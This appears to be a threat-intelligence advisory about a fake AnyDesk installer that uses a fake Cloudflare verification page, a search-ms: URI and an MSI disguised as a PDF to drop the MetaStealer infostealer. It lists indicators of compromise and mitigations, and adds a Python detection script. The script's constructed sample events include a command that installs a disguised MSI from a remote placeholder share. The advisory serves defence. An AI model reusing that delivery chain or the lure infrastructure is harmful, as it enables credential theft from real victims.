
From a Fake AnyDesk Installer to MetaStealer

Severity: Medium
Published: Sat Aug 30 2025 (08/30/2025, 09:10:00 UTC)
Source: AlienVault OTX General

Description

A recent campaign that borrows ClickFix tactics used a fake AnyDesk installer to deploy MetaStealer. The infection chain combined a fake Cloudflare Turnstile verification page, a Windows Search protocol (search-ms:) URI and an MSI package disguised as a PDF. Where classic ClickFix sends the victim to the Run dialog, this variant opened Windows File Explorer instead. The chain also captured the victim's hostname before dropping MetaStealer, a commodity infostealer that harvests credentials and steals files. The incident shows how social-engineering lures keep changing and why detection content and user training need to keep pace.

AI-Powered Analysis

Last updated: 09/01/2025, 08:33:06 UTC

Technical Analysis

This campaign uses a fake AnyDesk installer to deliver MetaStealer, a commodity information stealer. The chain borrows from ClickFix, which is a social-engineering technique rather than a malware family, but changes the execution step. The lure impersonates Cloudflare's Turnstile CAPTCHA and asks the victim to complete a "verification". Where classic ClickFix has the victim paste a command into the Windows Run dialog, this variant hands the browser a Windows Search protocol (search-ms:) URI, which opens File Explorer on a location the attacker controls; the victim sees what looks like a PDF in an ordinary Explorer window. That file is an MSI package, so double-clicking it starts msiexec.exe rather than a PDF reader, and the familiar extension makes the click more likely. The chain captures the victim's hostname along the way and ends by dropping MetaStealer, which harvests credentials from password stores and steals files, giving the operator material for credential reuse and lateral movement.

The pulse maps the activity to the following MITRE ATT&CK techniques: T1566 Phishing; T1204 User Execution; T1036 Masquerading; T1059.003 Command and Scripting Interpreter: Windows Command Shell; T1027 Obfuscated Files or Information; T1140 Deobfuscate/Decode Files or Information; T1055 Process Injection; T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; T1012 Query Registry; T1083 File and Directory Discovery; T1087 Account Discovery; T1005 Data from Local System; T1056.001 Input Capture: Keylogging; T1113 Screen Capture; T1114.001 Email Collection: Local Email Collection; T1555 Credentials from Password Stores; T1074.001 Data Staged: Local Data Staging; T1102 Web Service; T1070.004 Indicator Removal: File Deletion.

The pulse's indicators (listed below) are three SHA-256 hashes, one IP address, two URLs on the lure domain and seven domains used for the fake installer and command and control. The campaign is a reminder that social-engineering lures evolve faster than static signatures and that both detection content and user awareness need to be refreshed.

Potential Impact

For European organizations the main risk is to the confidentiality of credentials and data. MetaStealer's credential harvesting can give an attacker access to corporate networks, mailboxes and cloud services, with data breaches, intellectual-property theft and financial fraud as likely follow-ons. The AnyDesk disguise matters because AnyDesk is common in remote support and administration: staff who expect to install it will trust the lure, and organizations with remote workforces or heavy reliance on remote-access tools are the most exposed. Opening File Explorer through a search-ms: URI and presenting the MSI as a PDF both raise the chance that a user completes the chain, and MetaStealer's persistence (T1547.001) and file deletion (T1070.004) can keep it on the host long enough for credential reuse and lateral movement. The medium severity reflects that the chain needs user interaction at two points (the fake verification page and the fake PDF) but does real damage when it succeeds. Phishing and social engineering remain the primary initial-access vector, and in Europe's regulated environment a credential breach carries reporting obligations on top of the direct loss.

Mitigation Recommendations

1. Block the campaign's domains and URLs at the web proxy and DNS layer (anydeesk.ink, verification.anydeesk.ink and the other domains listed below) and filter mail that links to them.
2. Use EDR rules that flag msiexec.exe installing a package from a UNC, WebDAV or other remote path, explorer.exe handling a search-ms: URI whose location crumb is remote, masquerading (double extensions such as .pdf.msi) and process injection.
3. Enforce application control (AppLocker or WDAC) so that MSI packages run only from approved locations; a package opened from a remote share or a user's Downloads folder should fail the policy.
4. Train users that AnyDesk and similar tools are installed only from the vendor site or the internal software catalogue, that a "verification" page imitating Cloudflare Turnstile never asks them to open a file or run a command, and that a PDF does not produce a Windows Installer prompt.
5. Monitor for search-ms: URIs reaching explorer.exe, especially with crumb=location pointing at a remote host, and for File Explorer windows spawned by a browser process. If no business process needs the Windows Search protocol from the web, its protocol handler registration can be removed after testing.
6. Audit and restrict administrative privileges and credential storage on endpoints to limit what a stealer can collect.
7. Require multi-factor authentication on every remote-access, mail and cloud service so that stolen passwords alone are not enough.
8. Load the indicators below (SHA-256 hashes, IP, URLs, domains) into SIEM, EDR and DNS logging and alert on matches.
9. Run phishing simulations that use current lures, including fake CAPTCHA pages and fake remote-access installers.
10. Restrict Windows Installer to administrators where feasible (the "Turn off Windows Installer" policy) and disable scripting interpreters that users do not need.
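A hunting check over process-creation telemetry is the most useful thing to have for recommendations 2, 5 and 8 above and for the chain laid out in the technical analysis. The following is an added example written for this page, not code from the Huntress report or the OTX pulse. It assumes Sysmon-style process-creation records with parent image, image and command line; the host files.example.invalid is a placeholder, the rule names are my own, and the sample command lines are constructed illustrations of the chain rather than captured telemetry.

```python
"""Hunt for the fake-AnyDesk ClickFix delivery chain in process-creation logs.

Added example; this is not code from the Huntress write-up or the OTX pulse.
It runs over constructed Sysmon-style process-creation records (parent image,
image, command line) and applies three checks that follow the chain described
on this page:
  1. a search-ms: URI handed to File Explorer whose location crumb is remote
     (a UNC or WebDAV share, or a URL) rather than a local folder,
  2. msiexec.exe installing a package from a remote path, or a package whose
     name carries a document extension in front of .msi (the "PDF" disguise),
  3. a plain string match against the domains and IP listed in the pulse.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import unquote

# Indicators copied from the pulse above.
IOC_DOMAINS = {
    "anydeesk.ink", "verification.anydeesk.ink", "chat1.store",
    "cmqsqomiwwksmcsw.xyz", "macawiwmaacckuow.xyz", "teams-one.com",
    "yeosyyyaewokgioa.xyz",
}
IOC_IPS = {"38.134.148.74"}


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    rule: str
    detail: str


SEARCH_MS_RE = re.compile(r"search-ms:[^\s\"']+", re.IGNORECASE)
# crumb=location: naming a UNC path (\\host, incl. \\host@SSL\DavWWWRoot) or a URL.
REMOTE_LOCATION_RE = re.compile(r"location:\s*(\\\\|//|https?://)", re.IGNORECASE)
MSI_PATH_RE = re.compile(r"\"([^\"]+\.msi)\"|(\S+\.msi)\b", re.IGNORECASE)
DOC_BEFORE_MSI_RE = re.compile(r"\.(pdf|docx?|xlsx?|txt|jpe?g|png)\.msi$", re.IGNORECASE)


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_search_ms(ev: ProcEvent) -> list[Finding]:
    """Flag search-ms: URIs whose location crumb is remote; local searches are normal."""
    # Browsers often pass the URI percent-encoded, so decode before matching.
    m = SEARCH_MS_RE.search(unquote(ev.command_line))
    if m and REMOTE_LOCATION_RE.search(m.group(0)):
        return [Finding("search_ms_remote_location", m.group(0))]
    return []


def check_msiexec(ev: ProcEvent) -> list[Finding]:
    """Flag msiexec.exe installing from a remote path or a document-named package."""
    if _basename(ev.image) != "msiexec.exe":
        return []
    findings: list[Finding] = []
    for m in MSI_PATH_RE.finditer(ev.command_line):
        path = m.group(1) or m.group(2)
        if path.startswith("\\\\") or path.lower().startswith(("http://", "https://")):
            findings.append(Finding("msiexec_remote_package", path))
        if DOC_BEFORE_MSI_RE.search(path):
            findings.append(Finding("msiexec_disguised_package", path))
    return findings


def check_iocs(ev: ProcEvent) -> list[Finding]:
    """Plain substring match against the pulse's domains and IP."""
    text = unquote(ev.command_line).lower()
    hits = [d for d in IOC_DOMAINS if d in text] + [ip for ip in IOC_IPS if ip in text]
    return [Finding("ioc_match", h) for h in sorted(hits)]


def analyze_event(ev: ProcEvent) -> list[Finding]:
    return check_search_ms(ev) + check_msiexec(ev) + check_iocs(ev)


def hunt(events: list[ProcEvent]) -> list[tuple[int, Finding]]:
    """Return (event index, finding) pairs for every event that trips a rule."""
    return [(i, f) for i, ev in enumerate(events) for f in analyze_event(ev)]


# Constructed sample records. files.example.invalid is a placeholder host; the
# search-ms: and msiexec command lines illustrate the chain as the page describes
# it and are not copied from the Huntress telemetry.
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EXPLORER = r"C:\Windows\explorer.exe"
MSIEXEC = r"C:\Windows\System32\msiexec.exe"
SAMPLE_EVENTS = [
    # 0: the victim's browser opened the lure page (URL from the pulse).
    ProcEvent(EXPLORER, CHROME, f'"{CHROME}" http://anydeesk.ink/download/anydesk.html'),
    # 1: the lure handed a search-ms: URI to File Explorer; the crumb is a WebDAV share.
    ProcEvent(CHROME, EXPLORER, f'"{EXPLORER}" "search-ms:query=AnyDesk&crumb=location:'
              r'\\files.example.invalid@SSL\DavWWWRoot&displayname=AnyDesk%20Downloads"'),
    # 2: the user double-clicked the "PDF" shown in that window; it is an MSI.
    ProcEvent(EXPLORER, MSIEXEC, f'"{MSIEXEC}" /i '
              r'"\\files.example.invalid@SSL\DavWWWRoot\AnyDesk_Setup.pdf.msi"'),
    # 3: benign local search, must not fire.
    ProcEvent(CHROME, EXPLORER, f'"{EXPLORER}" "search-ms:query=invoice&crumb=location:'
              r'C:\Users\alice\Documents"'),
    # 4: benign local installer, must not fire.
    ProcEvent(EXPLORER, MSIEXEC, f'"{MSIEXEC}" /i "C:\\Users\\alice\\Downloads\\7z2408-x64.msi"'),
]


if __name__ == "__main__":
    for idx, finding in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {finding.rule} -> {finding.detail}")
```

Run it as a script to print the findings for the built-in samples, or feed ProcEvent records parsed from a Sysmon Event ID 1 or EDR export into hunt(). The search-ms: rule deliberately ignores local locations because Windows itself opens search-ms: URIs for ordinary searches; tune the remote-location and document-extension patterns to what your environment actually uses, and treat a hit on rule 1 followed by a hit on rule 2 from the same host as the strongest signal.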


Technical Details

Author: AlienVault
TLP: WHITE
References: https://www.huntress.com/blog/fake-anydesk-clickfix-metastealer-malware
Adversary: not attributed
Pulse ID: 68b2bfe8d3d1e1257af3bb2f
Threat Score: none

Indicators of Compromise

SHA-256 hashes

0fc76b7f06aa80a43abafc1e9b88348734e327feb306d700c877c6a210fbd5e7
513992d7076984d5c5a42affc12b6a00eef820f3254af75c9958ef3310190317
fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

IP address

38.134.148.74

URLs

http://anydeesk.ink/download/anydesk.html
http://verification.anydeesk.ink/reCAPTCHA-v2.php

Domains

anydeesk.ink
verification.anydeesk.ink
chat1.store
cmqsqomiwwksmcsw.xyz
macawiwmaacckuow.xyz
teams-one.com
yeosyyyaewokgioa.xyz

Threat ID: 68b556a2ad5a09ad00cb6363

Added to database: 9/1/2025, 8:17:38 AM

Last enriched: 9/1/2025, 8:33:06 AM

Last updated: 10/16/2025, 1:29:52 PM

Views: 173
